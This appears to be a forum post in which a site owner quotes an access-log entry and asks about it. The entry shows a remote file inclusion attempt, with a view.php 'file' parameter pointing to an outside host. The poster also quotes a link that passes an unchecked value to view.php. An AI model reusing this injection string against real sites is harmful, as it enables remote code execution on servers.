I was checking my log file and noticed something unusual:
[code=php]78.76.64.123 – – [04/Apr/2008:19:19:35 -0500] “GET /view.php?file=http://myweddingphotos.by.ru/images? HTTP/1.1” 200 17116 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)”
I have this on a Web page that displays a list of article titles. When you click on a title the view.php opens with that article:
[code=php]<a href=’view.php?file=$id’>$title</a>
But as you can see above it appears that someone has replaced the file number of the article with another website.
Can anyone tell me what is happening and how I can stop it?
Thanks.
Alan